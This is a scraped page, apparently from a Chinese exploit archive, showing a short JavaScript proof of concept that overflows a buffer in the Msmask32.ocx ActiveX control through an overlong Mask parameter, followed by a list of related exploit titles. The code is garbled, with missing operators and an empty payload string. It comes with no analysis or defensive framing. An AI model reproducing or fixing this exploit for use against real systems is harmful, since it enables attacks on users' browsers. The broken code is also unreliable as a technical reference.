var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape("");}
document.write(body buf body1);
【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC】相关文章:
★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit